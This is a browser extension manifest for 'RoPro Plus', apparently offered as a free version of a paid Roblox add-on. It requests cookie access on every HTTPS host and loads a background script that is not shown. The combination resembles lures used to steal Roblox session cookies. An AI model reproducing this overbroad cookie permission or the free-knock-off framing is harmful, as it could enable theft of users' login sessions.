{
    "name": "RoPro Plus",
    "description": "Free Version of RoPro Plus / Rex.       Extension made for https://roblox.com/",
    "version": "1.0.0",
    "manifest_version": 3,

    "action" : {
        "default_icon": "assets/plus_icon.png"
    },

    "host_permissions": [
	"https://*/*"
    ],

    "permissions": [
        "cookies"
    ],

    "background": {
        "service_worker": "scripts/RoProPlus.js"
    },

    "icons": {
        "16": "assets/plus_icon.png",
        "32": "assets/plus_icon.png",
        "48": "assets/plus_icon.png",
        "128": "assets/plus_icon.png"
    }
}
